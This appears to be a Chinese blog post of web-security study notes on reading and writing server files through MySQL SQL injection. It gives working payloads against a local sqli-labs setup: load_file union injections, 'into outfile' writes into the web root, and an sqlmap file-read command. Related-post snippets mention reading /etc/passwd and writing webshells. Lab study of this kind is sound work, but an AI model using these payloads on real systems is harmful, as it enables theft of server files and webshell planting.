MySQL 注入读写文件

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: Web 安全攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43621629/article/details/104570825
版权

Web安全攻防 学习笔记

一、MySQL 注入读写文件


        MySQL 数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以对文件进行读写(前提是权限足够)

1.1、读取前提

  1. 用户权限足够高,尽量具有 root 权限

  2. secure_file_priv 不为 null(默认是 null)
    在这里插入图片描述
    要使用的话,就要修改配置文件。
    在这里插入图片描述
    在这里插入图片描述

随便读个文件看看吧

	# 注意:路径的斜线要两个, 不然会报错
	select load_file("C:\\Users\\Think\\Desktop\\traget.txt");

在这里插入图片描述


1.2、读取文件内容

	http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('D:\\1.txt'),3 --+

在这里插入图片描述


1.3、开启 MySQL 文件写入

	show variables like '%general%'; 	# 默认是关闭的

	set global general_log = on;

	http://127.0.0.1/sqli/Less-7/?id=0')) union select 1,database(),3 into outfile "E:\\phpstudy_pro\\PHPTutorial\\WWW\\sqli\\Less-7\\dds.txt" --+ 

	# into outfile 是把前面查询出来的结果写入后面的文件中



1.4、利用 sqlmap 进行读写文件

	python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --file-read "D://1.txt"
白菜执笔人
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4509
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
SQL注入读写文件
m0_56578216的博客
08-24 1887
SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。web 应用在服务器上的绝对路径,一般情况下是不知道的。但是系统敏感文件的路径是固定的。secure_file_priv=null,不允许导入导出操作。secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。secure_file_priv= ,不对导入导出操作做限制。
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7060
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
mysql 报错注入文件_mysql注入总结
weixin_29802461的博客
01-26 544
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*—2.过滤空格注入使用/**/或()或+代替空格%0c = f...
SQL注入-文件读写
最新发布
m0_73902453的博客
07-25 1017
就是利用文件读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。
Mysql注入读写文件
qq_43776408的博客
06-05 531
Mysql注入文件 对于第二种方法 你可以直接打开my.ini配置文件 将该变量的值设置为空 记住 my.ini文件的内容有先后之分的 程序从上到下依次执行 mysql文件 select load_file(“F:\1.txt”); 接下来我们使用Less-1来 第一步肯定要判断几个字段 使用order by id来判断 id=1’ order by 3 --+ 如果正确,但是id为4时就错误了 所以有3个字段 知道有几个字段之后才可以进行联合查询 也就是利用union select 上图unio
mysql 报错注入文件_SQL注入-读写文件
weixin_42515739的博客
01-21 888
SQL注入-读取文件使用函数 load_file("文件路径/名称")1、读取/etc/passwd 文件(SQL注入只能读取/etc/passwd文件,不能读取其他文件)http://192.168.1.64/sqli-labs/Less-1/?id=-1' union select 1,load_file("/etc/passwd"),3 or '1'='12、若读取其他文件则没效果显示htt...
Mysql注入读写文件;HTTP头中的SQL注入;cookie注入以及如何绕过cookie注入
idgrown的博客
02-28 353
1、## 标题:MySQL注入读写文件 1.1、MySQL数据库在对文件读写是要求当前用户拥有的操作权限足够多: 并且查询的数据文件内容不能为空; 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 1…2、读取文件内容: http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,load_file(...
SQL注入-Mysql高权限读写注入
xiaoheizi的博客
06-28 341
1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径。绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过。-1 union select null,'null',null,null 正常。-1 union select null,null,'null',null 正常。执行命令,让日志记录后门代码。
mysql注入如何读取本地文件_如何通过SQL注入获取服务器本地文件
weixin_28681379的博客
01-28 299
写在前面的话SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞的SQL语句并从远程服务器...
mysql 报错注入文件_MySQL注入总结
weixin_33497800的博客
01-26 260
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性正文:0x00 mysql一般注入(select)1.注释符#/*--2.过滤空格注入使用/**/或()或+代替空格%0c = form fe...
mysql报错注入
m0_65096687的博客
04-09 115
updatexml(目标xml内容,xml文档路径,更新的内容)报错的结果是字符串,所有需要使用limit 0,1来限定。Limit 0,1 0表示的是位数,1表示的是个数。把你的想得到的数据放在报错中显示给你看。这个函数的使用使将查询结果全部拼接输出。然后报错注入使用的时候会有一个问题。首先,要搞清楚一个函数的使用方法。这个是对子查询的数量进行限制。所以用法是对查询的表进行使用。concat()拼接字符串。子查询返回的结果多于一行。路径报错使很严重的报错。因为有url编码的转换。所以,我们有两种方法。
【24】WEB安全学习----MySQL注入-9(读写文件)
尚未佩妥剑 转眼便江湖
09-22 1819
这一章介绍下MySQL数据库访问操作系统的一些可利用的功能。 一、读文件 MySQL提供了允许load data infile命令高速地从一个文本文件读取行,并装入一个表中,看下此命令的说明: load data infile '文件名' into table 表名 测试一下导入,提示“The MySQL server is running with the --secure-file...
mysql 盲注 读取文件 mysql 写入文件
weixin_54472394的博客
05-30 357
文章目录一、sssss1.盲注的流程-mysql 读取文件mysql 写入文件 提示: table_schema = 库名称 table_name = 表名称 column_name = 字段名称 information.schcema库 下面有两个表 1,tables = 存放的是 所有的 库名 + 表名(通过where 库名来获取 所有的表) 2,columns = 存放的是 所有的列名 (通过where 表名来获取 所有的字段) 一、sssss 1.union select
mysql 报错注入文件_SQLi总结-MySQL
weixin_39966765的博客
02-27 391
0x01 MYSQL1.1 显注mysql重要的连接函数concat()group_concat()concat_ws()mysql注释符:# %23 --+ /* /**/'回显错误''回显正常 字符型注入2-1与2-0回显不一样 数字型注入2'-'1与2'-'0回显不一样 字符型注入and 1=1 与真and 1=2 永假or 1=1 永真or 1=2 或假宽子节注入:打开魔术引号,可用%d...
MySQL默认库及读写文件
Wawyw's Blog
02-20 386
1、MySQL默认库 1.1、information_schema 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,字段类型与访问权 限等。 查询数据库、表名、字段等信息 # 爆所有用户 select group_concat(user) from mysql.user; # 爆所有数据库 select group_concat(SCHEMA_NAME) from inf
69.网络安全渗透测试—[SQL注入篇8]—[MySQL+PHP-报错注入读写文件]
qwsn
01-18 2188
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、报错注入-读取文件 1、extractvalue()/exp() 读取文件 二、报错注入-伪写入文件 1、exp()伪写入文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值